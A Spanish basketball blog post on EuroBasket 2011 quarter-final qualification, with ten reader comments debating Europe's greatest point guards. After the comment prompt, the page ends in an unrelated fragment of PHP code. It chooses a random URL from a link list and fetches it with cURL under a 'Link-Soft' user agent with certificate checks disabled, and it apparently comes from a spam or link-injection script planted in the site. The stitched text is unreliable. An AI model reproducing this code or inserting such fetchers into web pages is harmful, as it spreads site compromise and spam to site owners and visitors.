EuroNBAsket 2011: Jubilaciones anticipadas

12 de September de 2011 por TheDeerHunter

Turquía y Alemania quedan fuera de los cuartos. Tiene guasa viendo quien se clasifica en el otro grupo y en ningún caso parece un acierto de la organización. Es un hecho insólito que el subcampeón del mundo se quede fuera de las olimpiadas y no creo que beneficie al prestigio del baloncesto europeo perder un representante de tal nivel.

Nos despedimos de dos de los más grandes jugadores de la historia de nuestro continente. Dirk Nowitzki se marcha cuajando un torneo digno, manteniendo las esperanzas de su selección hasta el último momento. No es poco, dado el estátus de su selección y la exigencia de esta parte del cuadro, aunque de él siempre esperamos actuaciones sobrehumanas que en esta ocasión no hemos visto. Por su parte, Hidayet Turkoglu confirma su declive desde el carácter superlativo del jugador que recordamos en la última final de Orlando. Aquí ha sido uno más, en pocos casos determinante y sí muy irregular. Turquía aún se refleja excesivamente en él y aquí lo ha pagado. En cualquier cosa gloria a ambos. Han sido muy grandes y el baloncesto europeo les debe mucho.

Serbia 68 – Turquía 67: Vendetta espectacular, como si hubiera sido escrita por algún maquiavélico guionista de Hollywood. Esta vez el punto fue a favor de Serbia, al contrario que sucedió en el Eurobasket. El último cuarto fue una ruleta rusa apasionante “sólo para hombres” en la que cada canasta suponía un drama. Antes de eso Teodosic se quitó la espinita y mostró galones. A su nivel es posiblemente el mejor base puro de Europa y su país lo agradeció, aunque estuviera a punto de tirarlo todo por tierra en su último ataque. Esta vez los balcánicos defendieron como un equipo. Sufrieron nuevamente por dentro, donde son vulnerables, pero se encontraron con el mejor Tepic. Turquía, como todo el campeonato, fue de menos a más. Remontó en un extraordinario tercer cuarto pero le faltó referentes ofensivos al final. Turkoglu e Ilyasova estuvieron en un 30%. El segundo marró el tiro decisivo. Un mazazo que les marcará por muchos años.

Destacado: Milos Teodosic 20 ptos, 8 reb, 1 asis

Francia 69 – España 96: Versión bufa de una final anticipada. Unos que querían ganar y otros que querían perder. Casualmente ambos lograron el objetivo. Más allá de la consideración moral del asunto y de la lástima de tirar por tierra un duelo como este puede tener más lógica para Francia de lo que parece. El premio de una final no es baladí, y Francia ya conoce lo que significa no especular con este tipo de cosas. España también, por cierto. Digan lo que digan, los vecinos del norte no son los máximos favoritos. Así que, excepto los espectadores, contentos todos. Y pudimos ver mucho rato a jugadores como Seraphin, Traore, Ibaka, Llull, Sada o Claver. Quien no se conforma es porque no quiere.

Destacados NBA: Rudy Fernández 15 ptos, 4 reb, 6 asis, 3 rob; Serge Ibaka 10 ptos, 7 reb, 1 tap, 1 rob
Kevin Seraphin 18 ptos, 2 reb, 1 asis

Lituania 85 – Alemania 75: Los germanos dieron la cara hasta el final pero la cuestión cayó por su propio peso. Con un Nowitzki excesivamente fallón Kaman se erigió como baluarte. La anfitriona jugó a gran nivel imponiendo la veteranía de Jasikevicius y Kaukenas y el talento de Valanciunas. ¿Es Jasikevicius el mejor base europeo que han visto nuestros ojos?

Destacados NBA: Chris Kaman 25 ptos, 11 reb, 2 asis, 3 tap
Jonas Valanciunas 15 ptos, 4 reb, 2 tap
Destacado resto: Sarunas Jasikevicius 17 ptos, 4 reb, 4 asis, 1 rob

Comenta

10 comentarios a esta entrada

  1. Nacho dice:
    #1

    Hombre, gustos son gustos, pero así, a bote pronto, a mi me sale un tal Djorjevic. y si nos ponemos seguro que hay más. Y no sabría decir cual.
    Ayer, en la retransmisión ITU dijo que Sabonis es y será irrepetible, que por ejemplo, jugadores como Petrovic (Por el tipo de juego decía él) si es posible ver. Como he dicho antes gustos son gustos, y para mí, salvo Petrovic (el más grande de siempre) los demás son discutibles.
    Obviamente Drazen, aunque Alexander no era manco, y otro gran base, por cierto.

      Citar

  2. Txusma dice:
    #2

    Los Petrovic son los mejores hermanos de las historia o los Gasol empiezan a discutirles el cetro?

    Y Bodiroga vale como base, no? Y mi tb me viene a la cabeza Papaloukas…

      Citar

  3. Nacho dice:
    #3

    Sobre los hermanos: supongo que depende de muchos factores. Su influencia en el juego y en todo un país (baloncestísticamente hablando) Y creo que lo hecho por los Petrovic es superior. Tamién es cierto que esta es una dinastía terminada, y la de los Gasol (sin contar con el tercero, del que hablan maravillas) tiene todavía mucho recorrido, sobre todo por parte de Marc. Ya digo que lo que supuso para mí Drazen no lo conseguirá ningún jugador en la historia, entre otras cosas por una cuestión edad. Me veo en el instituto intentando repetir sus movimientos, incluso con la lengua fuera. ¡Joder! ¡me hice del Madrid y todo! (también es cierto que el Madrid de Basket, despertaba mis simpatías ya con tipos como Itu)
    De todas formas es difícil comparar épocas, por ejemplo tipos como Petrovic, el mismo Bodiroga (que vale de base y de lo que él quiera) o tantos otros podrían haber sido All Stars años y años si hubiesen dado en esta época.
    Y también hay envidias entre los propios compañeros que impiden agrandar leyendas. Los Blazers de Petrovic pudieron ser campeones si le hubieseb dado más cancha y las bolas calientes en al menos dos partidos de esas finales (me gustaría repasarlos algún día) pero parece que no molaba que ganasen gracias a un europeo. Igual que el Madrid de Petrovic perdió la final con el BarÇa porque Fernando Martín y compañía parece que no querían ganar por Petrovic, después de la Recopa que acababa de levantar para los blancos casi él solito.
    Por otro lado es cierto que es difícil quien es mejor y todas esas cosas pero he visto a pocos con la capacidad y acierto de jugarse las bolas calientes como Drazen.
    Y Papaloukas es la leche llevas razón. Y más que saldrán.

      Citar

  4. Denise dice:
    #4

    ¿Valen Tony Parker y JR Holden como bases europeos??

    Sobre Alemania, todo el mundo habla del duo Dirk-Kaman, pero el alero jovencito que tienen, un tal Robin Benzing es jodidamente bueno. Reconozco que antes del Eurobasket ni le conocía, pero en este torneo me he enamorado baloncestisticamente hablando de este jcompletisimo jugador, tiene tiro, rebotea, defiende, dribla, pasa,…y 22 años. No he encontrado que se haya presentado al Draft, lo que me sorprende, habiendo tanto zurullo drafteado…y no quiero dar nombres…

      Citar

  5. Sancho88 dice:
    #5

    No viene al caso sobre el debate de los bases, pero… S. Monya lo ha vuelto a hacer. Clutch time!!

      Citar

  6. MagicJohnson32 dice:
    #6

    Tremendo lo de Monya, lleva una media de 5 ppp pero ha ganado dos partidos sobre la bocina…

    Ah, coincido con Denise sobre Benzing, me ha encantado y tiene pinta de ser un proyecto de grandísimo jugador.

      Citar

  7. Txusma dice:
    #7

    Para proyecto Valanciunas…

    Sobre Benzing, en la NBA ya le estaban siguiendo pero el mismo retiró su nombre del draft de este año. El año que viene cumple 23 y ya será elegible automáticamente.

      Citar

  8. Blade Petrovic dice:
    #8

    Turkoglu no ha hecho un muy buen campeonato no?

      Citar

  9. Blade Petrovic dice:
    #9

    esqe aqi no se pilla la sexta ni marcatv

      Citar

  10. Sancho88 dice:
    #10

    Jeje. Su mejor partido fue contra España y Turquía ganó. Pero ya no es el de Sacramento u Orlando en su primera etapa, si es a lo que te refieres. Resta más que suma.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>